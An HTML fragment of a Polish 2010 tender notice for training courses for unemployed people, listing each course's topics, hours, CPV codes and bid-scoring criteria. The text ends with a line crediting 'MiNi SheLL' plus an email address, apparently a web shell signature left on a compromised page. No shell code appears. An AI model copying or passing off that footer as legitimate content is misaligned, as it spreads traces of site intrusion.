<li>4. dostosowanie ilości i jakości pomieszczeń oraz wyposażenia w sprzęt i pomoce dyd. do potrzeb szkolenia z uwzgl. bhp - 5</li>
<li>5. nadzór wewnetrzy służący podnoszeniu jakości prowadzonego szkolenia - 5</li>
<li>6. posiadanie przez instytucje szkoleniową certyfikatu jakości usług - 5</li>
<li>7. zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> KURS  SEKRETARKI ASYSTENTKI SZEFA Z PODSTAWAMI JĘZYKA ANGIELSKIEGO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> KURS  la 10 osób bezrobotnych, składający się z trzech bloków: 
BLOKU ZAWODOWEGO
Program szkolenia musi zawierać między innymi następujące zagadnienia:
- obsługę urządzeń biurowych m.in. faksu, kserokopiarki, magnetowidu, dyktafonu, rzutnika, automatycznej sekretarki itp.
- zasady sporządzania pism, 
- rejestrację korespondencji,
- podstawowe zasady obsługi interesantów,
- przygotowywanie i obsługę spotkań służbowych przełożonego,
- prowadzenie terminarza przełożonego,
- obsługę komputera: korzystanie z systemu WINDOWS, edytora teksu WORD, arkusza kalkulacyjnego EXCEL, programu POWERPOINT,
- korzystanie z Internetu i poczty elektronicznej.
Wymagana ilość godzin:
-teoretycznych - 42
(przypadających na jednego uczestnika szkolenia - zajęcia teoretyczne w 1 grupie 10 osobowej)
- praktycznych - 70
(przypadających na jednego uczestnika szkolenia - zajęcia praktyczne w 1 grupie 10 osobowej)
Wymagane jest jedno stanowisko komputerowe dla jednej osoby.
BLOKU NAUKI JĘZYKA ANGIELSKIEGO
Program szkolenia musi obejmować słownictwo przydatne w zawodzie sekretarki, asystentki szefa, umożliwiające komunikowanie się w typowych sytuacjach zawodowych.
Wymagana ilość godzin:
- teoretycznych - 60 
(przypadających na jednego uczestnika szkolenia - zajęcia teoretyczne w 1 grupie 10 osobowej)
BLOKU AKTYWNEGO POSZUKIWANIA PRACY:
W ramach tego bloku znaleźć się muszą między innymi następujące zagadnienia:
- autoprezentacja,
- rozmowa kwalifikacyjna,
- sporządzanie dokumentów aplikacyjnych.
Wymagana ilość godzin:
- teoretycznych 1 
(przypadających na jednego uczestnika szkolenia - zajęcia teoretyczne w 1 grupie 10 osobowej)
- praktycznych 7 
(przypadających na jednego uczestnika szkolenia - zajęcia praktyczne w 1 grupie 10 osobowej)
Czas trwania szkolenia: maksymalnie 6 tygodni przypadających w okresie czerwiec - pierwsza połowa sierpnia 2010r. 
Zamawiający wymaga aby szkolenie realizowane było według planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu zgodnie z art. 40 ust. 4 Ustawy o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008r. nr 69. 415 z późn. zm.). Realizując ten zapis Wykonawca powinien szkolenie przeprowadzić maksymalnie w czasie 6 tygodni..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. zakres i jakośc oferowanych programów szkoleń w tym wykorzystywanie standardów kwalif.zawod.i modułowych prog.szkoleń zaw.oraz sposób spr. efektów szk - 30</li>
<li>3. kwalifikacje kadry dydaktycznej - 10</li>
<li>4. dostosowanie ilości i jakości pomieszczeń oraz wyposażenia w sprzęt i pomoce dyd. do potrzeb szkolenia z uwzgl. Bhp, - 5</li>
<li>5. nadzór wewnetrzy służący podnoszeniu jakości prowadzonego szkolenia - 5</li>
<li>6. posiadanie przez instytucje szkoleniową certyfikatu jakości usług - 5</li>
<li>7. zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> KURS PRAWA JAZDY KAT. C.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> KURS dla  10 osób bezrobotnych, składający się z dwóch bloków:
BLOKU ZAWODOWEGO:
Program szkolenia musi odpowiadać programowi szkolenia określonemu przez Rozporządzenie Infrastruktury z dnia 27 października 2005r. w spawie szkolenia, egzaminowania uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów /Dz.U. z 2005r. nr 217, poz. 1834 z późn.zm./.
Celem szkolenia jest przygotowanie do egzaminu państwowego na prawo jazdy kat. C. 
Wykonawca zobowiązany jest do opłacenia kosztów w/w egzaminu. 
Wymagana ilość godzin:
- teoretycznych - 20 
(przypadających na jednego uczestnika szkolenia - zajęcia teoretyczne w 1 grupie 10 osobowej)
- praktycznych  - 30 
(przypadających na jednego uczestnika szkolenia - zajęcia praktyczne indywidualnie z instruktorem)
BLOKU AKTYWNEGO POSZUKIWANIA PRACY:
W ramach tego bloku znaleźć się muszą między innymi następujące zagadnienia:
- autoprezentacja,
- rozmowa kwalifikacyjna,
- sporządzanie dokumentów aplikacyjnych.
Wymagana ilość godzin:
- teoretycznych 1 
(przypadających na jednego uczestnika szkolenia - zajęcia teoretyczne w 1 grupie 10 osobowej)
- praktycznych 7 
(przypadających na jednego uczestnika szkolenia - zajęcia praktyczne w 1 grupie 10 osobowej)
Czas trwania szkolenia: maksymalnie 10 tygodni przypadających w okresie czerwiec - pierwsza połowa września 2010r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.12.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. zakres i jakośc oferowanych programów szkoleń w tym wykorzystywanie standardów kwalif.zawod.i modułowych prog.szkoleń zaw.oraz sposób spr. efektów szk - 30</li>
<li>3. kwalifikacje kadry dydaktycznej - 10</li>
<li>4. dostosowanie ilości i jakości pomieszczeń oraz wyposażenia w sprzęt i pomoce dyd. do potrzeb szkolenia z uwzgl. Bhp, - 5</li>
<li>5. nadzór wewnetrzy służący podnoszeniu jakości prowadzonego szkolenia - 5</li>
<li>6. posiadanie przez instytucje szkoleniową certyfikatu jakości usług - 5</li>
<li>7. zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> KURS OPERARATORA KOPARKO- ŁADOWARKI KL. III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> KURS dla  10 osób bezrobotnych, składający się z dwóch bloków:
BLOKU ZAWODOWEGO:
Program szkolenia musi zawierać między innymi następujące zagadnienia:
- budowa i obsługa koparko-ładowarki,
- zasady BHP,
- dokumentacja techniczna, 
- technologia wykonywania robót ziemnych koparko-ładowarką
- podstawy elektrotechniki i hydrauliki
- praktyczna nauka obsługi koparko-ładowarki,
Wymagana ilość godzin:
- teoretycznych - 116  
(przypadających na jednego uczestnika szkolenia - zajęcia teoretyczne w 1 grupie 10 osobowej)
- praktycznych  - 86 /łącznie ze stażem wstępnym/ - zajęcia praktyczne w 1 grupie 10 osobowej
 Blok ten musi  kończyć się egzaminem przed komisją powołaną przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego  w Warszawie.
BLOKU AKTYWNEGO POSZUKIWANIA PRACY:
W ramach tego bloku znaleźć się muszą między innymi następujące zagadnienia:
- autoprezentacja,
- rozmowa kwalifikacyjna,
- sporządzanie dokumentów aplikacyjnych.
Wymagana ilość godzin:
- teoretycznych 1 
(przypadających na jednego uczestnika szkolenia - zajęcia teoretyczne w 1 grupie 10 osobowej)
- praktycznych 7 
(przypadających na jednego uczestnika szkolenia - zajęcia praktyczne w 1 grupie 10 osobowej)
Czas trwania szkolenia: maksymalnie 7 tygodni przypadających w okresie czerwiec - sierpień 2010r. 
Zamawiający wymaga aby szkolenie realizowane było według planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu zgodnie z art. 40 ust. 4 Ustawy o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008r.  nr 69. 415 z późn. zm.). Realizując ten zapis Wykonawca powinien szkolenie przeprowadzić maksymalnie w czasie 7  tygodni..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. zakres i jakośc oferowanych programów szkoleń w tym wykorzystywanie standardów kwalif.zawod.i modułowych prog.szkoleń zaw.oraz sposób spr. efektów szk - 30</li>
<li>3. kwalifikacje kadry dydaktycznej - 10</li>
<li>4. dostosowanie ilości i jakości pomieszczeń oraz wyposażenia w sprzęt i pomoce dyd. do potrzeb szkolenia z uwzgl. Bhp - 5</li>
<li>5. nadzór wewnetrzy służący podnoszeniu jakości prowadzonego szkolenia - 5</li>
<li>6. posiadanie przez instytucje szkoleniową certyfikatu jakości usług - 5</li>
<li>7. zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> KURS  PRZEDSIĘBIORCZOŚCI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> KURS  dla 10 osób bezrobotnych, składający się z jednego bloku: 
BLOKU ZAWODOWEGO
Program szkolenia musi zawierać między innymi następujące zagadnienia:
- sporządzanie biznes planu,
- rejestracja firmy,
- zarządzanie finansami w małej firmie,
- formy opodatkowania,
- rozliczenia z Urzędem Skarbowym i ZUS-em,
- obsługa programu Płatnik.
Wymagana ilość godzin:
- teoretycznych - 20
(przypadających na jednego uczestnika szkolenia - zajęcia teoretyczne w 1 grupie 10 osobowej)
- praktycznych - 40
(przypadających na jednego uczestnika szkolenia - zajęcia praktyczne w 1 grupie 10 osobowej)
Wymagane jest jedno stanowisko komputerowe dla jednej osoby.
Czas trwania szkolenia: maksymalnie 2 tygodnie przypadające w lipcu 2010r. 
Zamawiający wymaga aby szkolenie realizowane było według planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu zgodnie z art. 40 ust. 4 Ustawy o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008r. nr 69. 415 z późn. zm.). Realizując ten zapis Wykonawca powinien szkolenie przeprowadzić maksymalnie w czasie 2 tygodni..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. zakres i jakośc oferowanych programów szkoleń w tym wykorzystywanie standardów kwalif.zawod.i modułowych prog.szkoleń zaw.oraz sposób spr. efektów szk - 30</li>
<li>3. kwalifikacje kadry dydaktycznej - 10</li>
<li>4. dostosowanie ilości i jakości pomieszczeń oraz wyposażenia w sprzęt i pomoce dyd. do potrzeb szkolenia z uwzgl. Bhp - 5</li>
<li>5. nadzór wewnetrzy służący podnoszeniu jakości prowadzonego szkolenia - 5</li>
<li>6. posiadanie przez instytucje szkoleniową certyfikatu jakości usług - 5</li>
<li>7. zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> KURS BRUKARZA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> KURS dla 10 osób bezrobotnych, składający się z dwóch bloków: 
BLOKU ZAWODOWEGO:
Program szkolenia musi zawierać między innymi następujące zagadnienia:
- przepisy BHP i p. poż.
- zapoznanie z narzędziami do układania kostki brukowej,
- przygotowanie podłoża do układania bruku,
- praktyczne układanie nawierzchni z kostki brukowej.			
Wymagana ilość godzin:
-teoretycznych 22
(przypadających na jednego uczestnika szkolenia - zajęcia teoretyczne w 1 grupie 10 osobowej)
- praktycznych 150
(przypadających na jednego uczestnika szkolenia - zajęcia praktyczne w  2 grupach 5 osobowych)
BLOKU AKTYWNEGO POSZUKIWANIA PRACY:
W ramach tego bloku znaleźć się muszą między innymi następujące zagadnienia:
- autoprezentacja,
- rozmowa kwalifikacyjna,
- sporządzanie dokumentów aplikacyjnych.
Wymagana ilość godzin:
-teoretycznych 1 
(przypadających na jednego uczestnika szkolenia - zajęcia teoretyczne w 1 grupie 10 osobowej)
- praktycznych 7 
(przypadających na jednego uczestnika szkolenia - zajęcia praktyczne w 1 grupie 10 osobowej)
Czas trwania szkolenia:  maksymalnie 6 tygodni przypadających w okresie lipiec - sierpień 2010r. 
Zamawiający wymaga aby szkolenie realizowane było według planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu zgodnie z art. 40 ust. 4 Ustawy o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008r. nr 69. 415 z późn. zm.). Realizując ten zapis Wykonawca powinien szkolenie przeprowadzić maksymalnie w czasie 6 tygodni..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. zakres i jakośc oferowanych programów szkoleń w tym wykorzystywanie standardów kwalif.zawod.i modułowych prog.szkoleń zaw.oraz sposób spr. efektów szk - 30</li>
<li>3. kwalifikacje kadry dydaktycznej - 10</li>
<li>4. dostosowanie ilości i jakości pomieszczeń oraz wyposażenia w sprzęt i pomoce dyd. do potrzeb szkolenia z uwzgl. Bhp, - 5</li>
<li>5. nadzór wewnetrzy służący podnoszeniu jakości prowadzonego szkolenia - 5</li>
<li>6. posiadanie przez instytucje szkoleniową certyfikatu jakości usług - 5</li>
<li>7. zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> KURS  OBSŁUGI KOMPUTERA I KASY FISKALNEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> KURS dla 20 osób bezrobotnych, składający się z dwóch bloków: 
BLOKU ZAWOODOWEGO
Program szkolenia musi zawierać między innymi następujące zagadnienia:
-  obsługę edytora tekstu WORD,
- obsługę arkusza kalkulacyjnego EXCEL
- obsługę Internetu i poczty elektronicznej,
- korzystanie z systemu WINDOWS,
- obsługę kasy fiskalnej.
Wymagana ilość godzin:
- teoretycznych - 0 
-praktycznych  - 82
(przypadających na jednego uczestnika szkolenia - zajęcia praktyczne w 2 grupach 10 osobowych)
Wymagane jest jedno stanowisko komputerowe dla jednej osoby.
BLOKU AKTYWNEGO POSZUKIWANIA PRACY:
W ramach tego bloku znaleźć się muszą między innymi następujące zagadnienia:
- autoprezentacja,
- rozmowa kwalifikacyjna,
- sporządzanie dokumentów aplikacyjnych.
Wymagana ilość godzin:
- teoretycznych 1 
(przypadających na jednego uczestnika szkolenia - zajęcia teoretyczne w 1 grupie 20 osobowej)
- praktycznych 7 
(przypadających na jednego uczestnika szkolenia - zajęcia praktyczne w 2 grupach 10 osobowych)
Czas trwania szkolenia:  maksymalnie 3 tygodnie przypadających w okresie sierpień 2010r.
Zamawiający wymaga aby szkolenie realizowane było według planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu zgodnie z art. 40 ust. 4 Ustawy o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008r. nr 69. 415 z późn. zm.). Realizując ten zapis Wykonawca powinien szkolenie przeprowadzić maksymalnie w czasie 3 tygodni..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. zakres i jakośc oferowanych programów szkoleń w tym wykorzystywanie standardów kwalif.zawod.i modułowych prog.szkoleń zaw.oraz sposób spr. efektów szk - 30</li>
<li>3. kwalifikacje kadry dydaktycznej - 10</li>
<li>4. dostosowanie ilości i jakości pomieszczeń oraz wyposażenia w sprzęt i pomoce dyd. do potrzeb szkolenia z uwzgl. Bhp, - 5</li>
<li>5. nadzór wewnetrzy służący podnoszeniu jakości prowadzonego szkolenia - 5</li>
<li>6. posiadanie przez instytucje szkoleniową certyfikatu jakości usług - 5</li>
<li>7. zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> KURS STYLISTKI PAZNOKCI KOSMETYCZKI Z ELEMENTAMI ROZPOCZĘCIA DZIAŁALNIOŚCI GOSPODARCZEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> KURS dla 10 osób bezrobotnych, składający   się z trzech bloków:
BLOKU ZAWODOWEGO:
Program szkolenia musi zawierać m.in. następujące zagadnienia:
-  pielęgnację cery i ciała;
- wykonywanie różnego rodzaju makijaży;
- wykonywanie zabiegów manicure i pedicure;
-  przedłużanie i modelowanie paznokci metodą żelową i akrylową;
-  zdobnictwo paznokci.
Wymagana ilość godzin :
-teoretycznych  - 20
(przypadających na jednego uczestnika szkolenia - zajęcia teoretyczne w 1 grupie 10 osobowej)
-praktycznych - 120
(przypadających na jednego uczestnika szkolenia - zajęcia praktyczne w 1 grupie 10 osobowej )
BLOKU PRZEDSIĘBIORCZOŚCI
Program szkolenia musi zawierać między innymi następujące zagadnienia:
- sporządzanie biznesplanu,
- rejestrowanie działalności,
- marketing małej firmy,
- obsługa programu Płatnik i rozliczenia z ZUS,
- formy opodatkowania i rozliczenia z Urzędem Skarbowym
Wymagana ilość godzin :
- teoretycznych 10
(przypadających na jednego uczestnika szkolenia - zajęcia teoretyczne w 1 grupie 10 osobowej)
-praktycznych 22
(przypadających na jednego uczestnika szkolenia - zajęcia praktyczne w 1 grupie 10 osobowej )
Wymagane jest jedno stanowisko komputerowe dla jednej osoby.
BLOKU AKTYWNEGO POSZUKIWANIA PRACY:
W ramach tego bloku znaleźć się muszą między innymi następujące zagadnienia:
- autoprezentacja,
- rozmowa kwalifikacyjna,
- sporządzanie dokumentów aplikacyjnych.
Wymagana ilość godzin:
-teoretycznych 1 
(przypadających na jednego uczestnika szkolenia - zajęcia teoretyczne w 1 grupie 10 osobowej)
-praktycznych 7 
(przypadających na jednego uczestnika szkolenia - zajęcia praktyczne w 1 grupie 10 osobowej)
Czas trwania szkolenia:  maksymalnie 6 tygodni przypadających w okresie sierpień - wrzesień 2010r. 
Zamawiający wymaga aby szkolenie realizowane było według planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu zgodnie z art. 40 ust. 4 Ustawy o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008r. nr 69. 415 z późn. zm.). Realizując ten zapis Wykonawca powinien szkolenie przeprowadzić maksymalnie w czasie 6 tygodni..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. zakres i jakośc oferowanych programów szkoleń w tym wykorzystywanie standardów kwalif.zawod.i modułowych prog.szkoleń zaw.oraz sposób spr. efektów szk - 30</li>
<li>3. kwalifikacje kadry dydaktycznej - 10</li>
<li>4. dostosowanie ilości i jakości pomieszczeń oraz wyposażenia w sprzęt i pomoce dyd. do potrzeb szkolenia z uwzgl. Bhp, - 5</li>
<li>5. nadzór wewnetrzy służący podnoszeniu jakości prowadzonego szkolenia - 5</li>
<li>6. posiadanie przez instytucje szkoleniową certyfikatu jakości usług - 5</li>
<li>7. zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> KURS TECHNOLOGA ROBÓT WYKOŃCZENIOWYCH Z ELEMENTAMI PROWADZENIA DZIAŁALNOŚCI GOSPODARCZEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> KURS dla 10 osób bezrobotnych, składający się z trzech bloków: 
BLOKU ZAWODOWEGO:
Program szkolenia musi zawierać między innymi następujące zagadnienia:
- zasady BHP i P.POŻ w budownictwie,
- przygotowanie podłoży,
- malowanie i tapetowanie,
- wykonywanie tynków,
- wykonywanie sufitów podwieszanych,
- zakładanie płytek, glazury.						
Wymagana ilość godzin:
-teoretycznych 20
(przypadających na jednego uczestnika szkolenia - zajęcia teoretyczne w 1 grupie 10 osobowej)
-praktycznych 180
(przypadających na jednego uczestnika szkolenia - zajęcia praktyczne w  2 grupach 5 osobowych)
BLOKU PRZEDSIĘBIORCZOŚCI:
Program szkolenia musi zawierać między innymi następujące zagadnienia:
- sporządzanie biznesplanu,
- rejestrowanie działalności,
- marketing małej firmy,
- obsługa programu Płatnik i rozliczenia z ZUS,
- formy opodatkowania i rozliczenia z Urzędem Skarbowym
Wymagana ilość godzin :
-teoretycznych 10
(przypadających na jednego uczestnika szkolenia - zajęcia teoretyczne w 1 grupie 10 osobowej)
-praktycznych 22
(przypadających na jednego uczestnika szkolenia - zajęcia praktyczne w 1 grupie 10 osobowej )
Wymagane jest jedno stanowisko komputerowe dla jednej osoby.
BLOKU AKTYWNEGO POSZUKIWANIA PRACY:
W ramach tego bloku znaleźć się muszą między innymi następujące zagadnienia:
- autoprezentacja,
- rozmowa kwalifikacyjna,
- sporządzanie dokumentów aplikacyjnych.
Wymagana ilość godzin:
-teoretycznych 1 
(przypadających na jednego uczestnika szkolenia - zajęcia teoretyczne w 1 grupie 10 osobowej)
-praktycznych 7 
(przypadających na jednego uczestnika szkolenia - zajęcia praktyczne w 1 grupie 10 osobowej)
Czas trwania szkolenia:  maksymalnie 8 tygodni przypadających w okresie wrzesień - październik 2010r. 
Zamawiający wymaga aby szkolenie realizowane było według planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu zgodnie z art. 40 ust. 4 Ustawy o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008r.  nr 69. 415 z późn. zm.). Realizując ten zapis Wykonawca powinien szkolenie przeprowadzić maksymalnie w czasie 8 tygodni..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. zakres i jakośc oferowanych programów szkoleń w tym wykorzystywanie standardów kwalif.zawod.i modułowych prog.szkoleń zaw.oraz sposób spr. efektów szk - 30</li>
<li>3. kwalifikacje kadry dydaktycznej - 10</li>
<li>4. dostosowanie ilości i jakości pomieszczeń oraz wyposażenia w sprzęt i pomoce dyd. do potrzeb szkolenia z uwzgl. Bhp - 5</li>
<li>5. nadzór wewnetrzy służący podnoszeniu jakości prowadzonego szkolenia - 5</li>
<li>6. posiadanie przez instytucje szkoleniową certyfikatu jakości usług - 5</li>
<li>7. zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com